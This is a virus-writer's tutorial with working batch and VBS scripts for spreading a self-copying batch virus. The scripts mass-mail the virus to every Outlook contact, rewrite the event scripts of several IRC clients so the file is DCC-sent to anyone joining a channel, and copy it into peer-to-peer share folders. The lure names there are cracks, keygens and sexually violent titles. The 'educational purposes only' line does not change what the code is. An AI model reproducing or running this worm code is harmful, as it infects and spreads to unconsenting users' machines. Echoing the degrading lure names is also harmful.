281 lines
14 KiB
Plaintext
281 lines
14 KiB
Plaintext
|
|
TUTORIAL:
|
|
|
|
Batch IRC/Outlook Spreading
|
|
|
|
By
|
|
|
|
cOrRuPt G3n3t!x
|
|
|
|
|
|
Welcome back to my 3rd batch tutorial of which we shall now discuss how to spread your batch
|
|
virus over IRC (Internet Chat Relay) and MS Outlook. I have seen many different methods, but
|
|
these seem to be the best so far. I will show how to spread over mIRC, pIRCh, VIRC, dIRC,
|
|
XiRCON, KazaA, morpheus, limewire, bearshare etc... I would like to say thanks to SPTH for
|
|
some of his IRC scripts although i needed to edit some as it would not run on my system!
|
|
Please remember all these scripts are working BATCH scripts!
|
|
|
|
1)MS Outlook:
|
|
----------
|
|
|
|
MS Outlook has for many years been an excellent way of spreading virii. The actual script to spread
|
|
over MS Outlook is a VBS but we shall adapt it to be able to work in batch. See below:
|
|
-------------------------------[Cut Here]--------------------------------------
|
|
echo.on error resume next>>C:\MSO.vbs
|
|
echo.dim a,b,c,d,e>>C:\MSO.vbs
|
|
echo.set a=Wscript.CreateObject("Wscript.Shell")>>C:\MSO.vbs
|
|
echo.set b=CreateObject("Outlook.Application")>>C:\MSO.vbs
|
|
echo.set c=b.GetNameSpace("MAPI")>>C:\MSO.vbs
|
|
echo.for y=1 To c.AddressLists.Count>>C:\MSO.vbs
|
|
echo.set d=c.AddressLists(y)>>C:\MSO.vbs
|
|
echo.x=1 '>>C:\MSO.vbs
|
|
echo.set e=b.CreateItem(0)>>C:\MSO.vbs
|
|
echo.for o=1 To d.AddressEntries.Count>>C:\MSO.vbs
|
|
echo.f=d.AddressEntries(x)>>C:\MSO.vbs
|
|
echo.e.Recipients.Add f>>C:\MSO.vbs
|
|
echo.x=x+1>>C:\MSO.vbs
|
|
echo.next>>C:\MSO.vbs
|
|
echo.e.Subject="Your Subject here">>C:\MSO.vbs
|
|
echo.e.Body="Your Body here">>C:\MSO.vbs
|
|
echo.e.Attachments.Add("c:\p2pdon.bat")>>C:\MSO.vbs
|
|
echo.e.DeleteAfterSubmit=False>>C:\MSO.vbs
|
|
echo.e.Send>>C:\MSO.vbs
|
|
echo.f ="">>C:\MSO.vbs
|
|
echo.next>>C:\MSO.vbs
|
|
call C:\MSO.vbs
|
|
Del C:\MSO.vbs
|
|
-------------------------------[Cut Here]--------------------------------------
|
|
Next to customize this script for your batch look at lines 15, 16 and 17. You will enter the subject of your e-mail
|
|
in line 15 then the main body in line 16 an finally where your virus is located in line 17.
|
|
|
|
|
|
2)mIRC:
|
|
-----
|
|
|
|
Next we will spread over mIRC a well known IRC. mIRC has a long list of possible places it could be installed too
|
|
so lets begin:
|
|
-------------------------------[Cut Here]--------------------------------------
|
|
copy %0 "%SystemDrive%\Windows\WinDef.bat"
|
|
if exist "%SystemDrive%\mirc\" goto m1
|
|
if exist "%ProgramFiles%\mirc\" goto m2
|
|
goto piRCh
|
|
:m1
|
|
echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\mscript.vbs
|
|
echo.set scriptini=fso.CreateTextFile("C:\mirc\script.ini")>>C:\mscript.vbs
|
|
echo.scriptini.WriteLine "[script]">>C:\mscript.vbs
|
|
echo.scriptini.WriteLine "n0=on 1:JOIN:#:{">>C:\mscript.vbs
|
|
echo.scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }">>C:\mscript.vbs
|
|
echo.scriptini.WriteLine "n2= /.dcc send $nick c:\windows\WinDef.bat">>C:\mscript.vbs
|
|
echo.scriptini.WriteLine "n3=}">>C:\mscript.vbs
|
|
echo.scriptini.close>>C:\mscript.vbs
|
|
call C:\mscript.vbs
|
|
del C:\mscript.vbs
|
|
goto pIRCh
|
|
:m2
|
|
echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\mscript.vbs
|
|
echo.set scriptini=fso.CreateTextFile("C:\Program Files\mirc\script.ini")>>C:\mscript.vbs
|
|
echo.scriptini.WriteLine "[script]">>C:\mscript.vbs
|
|
echo.scriptini.WriteLine "n0=on 1:JOIN:#:{">>C:\mscript.vbs
|
|
echo.scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }">>C:\mscript.vbs
|
|
echo.scriptini.WriteLine "n2= /.dcc send $nick c:\windows\WinDef.bat">>C:\mscript.vbs
|
|
echo.scriptini.WriteLine "n3=}">>C:\mscript.vbs
|
|
echo.scriptini.close>>C:\mscript.vbs
|
|
call C:\mscript.vbs
|
|
del C:\mscript.vbs
|
|
|
|
:pIrCh
|
|
-------------------------------[Cut Here]-------------------------------------------
|
|
Now this is working script for mIRC, all you need to change is the GOTO prameters, according
|
|
to what you want mIRC to goto which are lines 3 and 15, next you will have to also change where
|
|
your virus is allocated lines 1, 10 and 22 near the end of the statement! All this will
|
|
do is make the script in C:\ directory, call it and then delete it.
|
|
|
|
|
|
3)pIRCh:
|
|
-------
|
|
|
|
Another well known IRC which we shall spread through. See below for the working batch script:
|
|
-------------------------------[Cut Here]--------------------------------------------
|
|
If not exist "C:\Pirch98\" goto kazaA
|
|
if exist "%SystemDrive%\Pirch98\" goto p_inf
|
|
:p_inf
|
|
copy %0 "%SystemDrive%\Pirch98\WinDef.bat"
|
|
echo.Dim pirch>>C:\pirch.vbs
|
|
echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\pirch.vbs
|
|
echo.set pirch=fso.CreateTextFile("C:\pirch98\events.ini")>>C:\pirch.vbs
|
|
echo.pirch.WriteLine "[Levels]">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "Enabled=1">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "Count=6">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "Level1=000-Unknows">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "000-UnknowsEnabled=1">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "Level2=100-Level 100">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "100-Level 100Enabled=1">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "Level3=200-Level 200">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "200-Level 200Enabled=1">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "Level4=300-Level 300">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "300-Level 300Enabled=1">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "Level5=400-Level 400">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "400-Level 400Enabled=1">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "Level6=500-Level 500">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "500-Level 500Enabled=1">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "[000-Unknowns]">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "User1=*!*@*">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "UserCount=1">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "Events1=ON JOIN:#: /dcc send $nick C:\Pirch98\Windef.bat">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "EventCount=1">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "[100-Level 100]">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "UserCount=0">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "EventCount=0">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "[200-Level 200]">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "UserCount=0">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "EventCount=0">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "[300-Level 300]">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "UserCount=0">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "EventCount=0">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "[400-Level 400]">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "UserCount=0">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "EventCount=0">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "[500-Level 500]">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "UserCount=0">>C:\pirch.vbs
|
|
echo.pirch.WriteLine "EventCount=0">>C:\pirch.vbs
|
|
echo.pirch.Close>>C:\pirch.vbs
|
|
call C:\pirch.vbs
|
|
del C:\pirch.vbs
|
|
|
|
:kazaA
|
|
-------------------------------[Cut Here]-------------------------------------------------------
|
|
There is the full script, once again, GOTO parameters need to be changed accordingly(lines 1 and last line)
|
|
than also lines 4 and 26 need to be changed according to where your virus is.
|
|
|
|
|
|
4)KazaA:
|
|
------
|
|
|
|
Another IRC, pretty simple see below:
|
|
-------------------------------[Cut Here]--------------------------------------------------------
|
|
if exist "%SystemDrive%\Kazaa\" goto vIRC
|
|
if exist "%SystemDrive%\Kazaa\" goto kazaa_inf
|
|
:kazaa_inf
|
|
copy %0 "%SystemDrive%\Kazaa\"
|
|
echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\k.vbs
|
|
echo.set shell=CreateObject("WScript.Shell")>>C:\k.vbs
|
|
echo.shell.RegWrite "HKLM\Software\KaZaA\Transfer\DlDir0", "C:\Kazaa\">>C:\k.vbs
|
|
call C:\k.vbs
|
|
del C:\k.vbs
|
|
|
|
:vIRC
|
|
-------------------------------[Cut Here]---------------------------------------------------------
|
|
Just make sure you copy your virus into the directory 'C:\Kazaa'!!! By now im sure
|
|
you've got the hang of changing Parameters! so go ahead you can do it :)
|
|
|
|
|
|
5)vIRC:
|
|
-----
|
|
|
|
We now see a similar script as above for vIRC just put it under your infection routine and
|
|
change the paths etc to your batchs':
|
|
-------------------------------[Cut Here]----------------------------------------------------------
|
|
if exist "%SystemDrive%\Virc\" goto v_inf
|
|
if not exist "%SystemDrive%\Virc\" goto XiRCON
|
|
:v_inf
|
|
copy %0 "%SystemDrive%\Virc\WinDef.bat"
|
|
echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\v.vbs
|
|
echo.set shell=CreateObject("WScript.Shell")>>C:\v.vbs
|
|
echo.shell.RegWrite "HKEY_CURRENT_USER\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events\Event17", "dcc send $nick C:\Virc\WinDef.bat">>C:\v.vbs
|
|
call C:\v.vbs
|
|
del C:\v.vbs
|
|
|
|
:XiRCON
|
|
-------------------------------[Cut Here]----------------------------------------------------------
|
|
|
|
|
|
6)XiRCON:
|
|
-------
|
|
|
|
This is a IRC spreading technique for XiRCON just change paths and names for your batch(Thanks to SPTH):
|
|
-------------------------------[Cut Here]----------------------------------------------------------
|
|
IF EXIST "%SystemDrive%\Program Files\XiRCON\Default.tcl" goto inf_xircon
|
|
IF NOT EXIST "%SystemDrive%\Program Files\XiRCON\Default.tcl" GOTO dIRC
|
|
:inf_xircon
|
|
echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\xi.vbs
|
|
echo.set xi=fso.CreateTextFile("C:\Default.tcl")>>C:\xi.vbs
|
|
echo.xi.writeline " on ctcp {">>C:\xi.vbs
|
|
echo.xi.writeline " foreach n [channels] {">>C:\xi.vbs
|
|
echo.xi.writeline " if {$n != [my_nick]} {">>C:\xi.vbs
|
|
echo.xi.writeline " /dcc send $n C:\Windows\WinDef.bat">>C:\xi.vbs
|
|
echo.xi.writeline " }">>C:\xi.vbs
|
|
echo.xi.writeline " }">>C:\xi.vbs
|
|
echo.xi.writeline "}">>C:\xi.vbs
|
|
copy %0 "%SystemDrive%\Virc\WinDef.bat"
|
|
del /f /q "%SystemDrive%\Program Files\XiRCON\Default.tcl"
|
|
call C:\xi.vbs
|
|
del C:\xi.vbs
|
|
copy "C:\Default.tcl" "%SystemDrive%\Program Files\XiRCON\Default.tcl"
|
|
|
|
|
|
:dIRC
|
|
-------------------------------[Cut Here]------------------------------------------------------------
|
|
|
|
|
|
|
|
7)dIRC:
|
|
------
|
|
|
|
There are a bit more options on this script, you can either add your new script to the existing one
|
|
or make a whole new one entirely, SPTH decided to make a new one so let us go with his advice
|
|
as above just change paths and goto parameter as needed by your batch:
|
|
-------------------------------[Cut Here]-------------------------------------------------------------
|
|
if exist "%SystemDrive%\Programme\Dragonmount Networks\dIRC\scripts\" goto inf_dirc >nul
|
|
if exist not "%SystemDrive%\Programme\Dragonmount Networks\dIRC\scripts\" goto randomspread
|
|
:inf_dirc
|
|
copy %0 "%SystemDrive%\Windows\WinDef.bat"
|
|
echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\dirc.vbs
|
|
echo.set dirc=fso.CreateTextFile("C:\virus.dsf")>>C:\dirc.vbs
|
|
echo.dirc.writeline "#commands">>C:\dirc.vbs
|
|
echo.dirc.writeline "#VBScript">>C:\dirc.vbs
|
|
echo.dirc.writeline "!!! Do not edit the contents of this file. !!!">>C:\dirc.vbs
|
|
echo.dirc.writeline "">>C:\dirc.vbs
|
|
echo.dirc.writeline "#EVENT# vir Join * * on">>C:\dirc.vbs
|
|
echo.dirc.writeline "sendcommand /dcc send & Nick & C:\Windows\WinDef.bat">>C:\dirc.vbs
|
|
echo.dirc.writeline "===">>C:\dirc.vbs
|
|
call C:\dirc.vbs
|
|
del C:\dirc.vbs
|
|
copy "C:\virus.dsf" "%SystemDrive%\Programme\Dragonmount Networks\dIRC\scripts\" >nul
|
|
echo.C:\Programme\Dragonmount Networks\dIRC\scripts\standard.dsf commands VBScript>>scripts.drc
|
|
echo.C:\Programme\Dragonmount Networks\dIRC\scripts\virus.dsf commands VBScript>>scripts.drc
|
|
|
|
:randomspread
|
|
-------------------------------[Cut Here]-------------------------------------------------------------
|
|
|
|
|
|
|
|
8)Random Share Spread (RSS):
|
|
-------------------------
|
|
|
|
This is just random spreading through a multitude of different shareware sites:
|
|
just add to the spread routine in your code:
|
|
-------------------------------[Cut Here]-------------------------------------------------------------
|
|
:randomspread:
|
|
COPY %0 "%SystemDrive%\mydocu~1\Crysis_keygen.bat" >nul
|
|
COPY %0 "%SystemDrive%\mydocu~1\Kaspersky_Antivirus_10_Limited_Edition.url.bat" >nul
|
|
COPY %0 "%SystemDrive%\kazaa\myshar~1\FHM_2009_MODELS.jpg.bat" >nul
|
|
COPY %0 "%ProgramFiles%\applej~1\incoming\Windows_Vista_Crack.bat" >nul
|
|
COPY %0 "%ProgramFiles%\bearsh~1\shared\XXX_SITE_PASSWORDS.bat" >nul
|
|
COPY %0 "%ProgramFiles%\eDonkey2000\incoming\Teen_Forced_To_Suck.wmv.bat" >nul
|
|
COPY %0 "%ProgramFiles%\emule\incoming\Windows7_RC1_Downloader.bat" >nul
|
|
COPY %0 "%ProgramFiles%\grokster\mygrok~1\ICE_AGE_3.wmv.bat" >nul
|
|
COPY %0 "%ProgramFiles%\icq\shared~1\Norton_AV_2009_CRACKED.exe.bat" >nul
|
|
COPY %0 "%ProgramFiles%\kazaa\myshar~1\EBONY_WHORE_RAPED.mp4.bat" >nul
|
|
COPY %0 "%ProgramFiles%\kazaal~1\myshar~1\VisualC_Keygen_2009.bat" >nul
|
|
COPY %0 "%ProgramFiles%\kmd\myshar~1\EXPLOITED_ASIANS.wmv.bat" >nul
|
|
COPY %0 "%ProgramFiles%\limewire\shared\ASS_LICKERS.MOV.bat" >nul
|
|
COPY %0 "%ProgramFiles%\morpheus\myshar~1\Hard_Russian_rape.wmv.bat" >nul
|
|
COPY %0 "%ProgramFiles%\overnet\bundles\Virgins_1st_fuck.mp4.bat" >nul
|
|
exit
|
|
-------------------------------[Cut Here]-------------------------------------------------------------
|
|
|
|
I have been writing this tutorial for well over 2 hours now, so it's time for me to go, If you have any bugs or queries e-mail them to me at
|
|
and i'll do my best to help. Remember this is for educational purpose only! ;) Let me jus batch off!! This is Corrupt Genetix signing out.
|
|
REMEMBER THIS IS FOR EDUCATIONAL PURPOSES ONLY!!
|
|
|